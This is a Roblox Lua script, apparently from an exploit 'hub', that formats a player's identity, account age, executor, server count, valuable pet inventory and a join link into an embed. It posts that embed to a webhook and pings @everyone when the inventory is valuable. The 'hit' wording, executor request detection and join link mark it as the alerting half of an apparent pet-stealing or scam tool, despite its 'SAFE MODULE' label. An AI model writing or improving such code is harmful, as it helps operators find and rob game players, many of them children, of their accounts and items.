--// MONDEUR HUB | ADM HIT 🦊 (SAFE MODULE)

local HttpService = game:GetService("HttpService")

local webhook = "PUT_YOUR_WEBHOOK_HERE"
local threshold = 500

-- executor-safe request
local req =
    (syn and syn.request) or
    (http and http.request) or
    (http_request) or
    (request)

if not req then
    warn("No request function available")
    return
end

-- =========================
-- 🎨 RARITY COLOR + EMOJI
-- =========================
local rarityColors = {
    legendary = 0xFFD700,
    ultra_rare = 0xA020F0,
    rare = 0x1E90FF,
    uncommon = 0x32CD32,
    common = 0xB0B0B0
}

local function getEmoji(p)
    local e = ""
    if p.mega then e ..= "🌈 " elseif p.neon then e ..= "🟣 " end
    if p.fly then e ..= "🪽 " end
    if p.ride then e ..= "🏇 " end
    return e
end

-- =========================
-- 📦 STACK + SORT
-- =========================
local function processPets(pets)
    local map = {}
    local total = 0

    for _, p in ipairs(pets) do
        local key = p.name

        if not map[key] then
            map[key] = {
                name = p.name,
                count = 0,
                value = p.value or 0,
                rarity = p.rarity or "common",
                neon = p.neon,
                mega = p.mega,
                fly = p.fly,
                ride = p.ride
            }
        end

        map[key].count += 1
        total += (p.value or 0)
    end

    local list = {}
    for _, v in pairs(map) do table.insert(list, v) end

    table.sort(list, function(a,b)
        return a.value > b.value
    end)

    return list, total
end

-- =========================
-- 📋 FORMAT
-- =========================
local function format(list)
    local t = {}
    for i, p in ipairs(list) do
        if i > 12 then break end
        table.insert(t,
            string.format("%s%s x%d", getEmoji(p), p.name, p.count)
        )
    end
    return (#t > 0 and table.concat(t,"\n") or "No pets")
end

-- =========================
-- 🚀 SEND FUNCTION
-- =========================
local function send(dataInput)
    local list, totalValue = processPets(dataInput.pets)
    local petList = format(list)

    local content = (totalValue >= threshold) and "@everyone" or ""

    local color = rarityColors[list[1] and list[1].rarity or "common"] or 0x2F3136

    local embed = {
        title = "🦊 Mondeur Hub | Adm Hit",
        description =
            "```" ..
            "👤 Display Name : " .. dataInput.player.displayName .. "\n" ..
            "🆔 Username     : " .. dataInput.player.username .. "\n" ..
            "📅 Account Age  : " .. dataInput.player.accountAge .. " days\n" ..
            "📱 Executor     : " .. dataInput.player.executor .. "\n" ..
            "👥 Players      : " .. dataInput.player.players .. "\n" ..
            "💰 Total Value  : " .. totalValue ..
            "```",
        fields = {
            {
                name = "🐶 Pets (Best → Worst)",
                value = "```" .. petList .. "```"
            },
            {
                name = "🌐 Join",
                value = "[Click to Join](" .. (dataInput.joinLink or "https://www.roblox.com") .. ")"
            }
        },
        color = color,
        footer = {text = "Mondeuronbotton"}
    }

    task.spawn(function()
        pcall(function()
            req({
                Url = webhook,
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = HttpService:JSONEncode({
                    content = content,
                    embeds = {embed}
                })
            })
        end)
    end)
end

-- =========================
-- 🧪 EXAMPLE USAGE
-- =========================
send({
    player = {
        displayName = "Chafya",
        username = "cfpaj67",
        accountAge = 2056,
        executor = "Delta",
        players = "24/35"
    },

    joinLink = "https://www.roblox.com",

    pets = {
        {name="Metal Ox", value=500, rarity="legendary", neon=true, ride=true},
        {name="Metal Ox", value=500, rarity="legendary", neon=true, ride=true},
        {name="Dog", value=5, rarity="common"}
    }
})
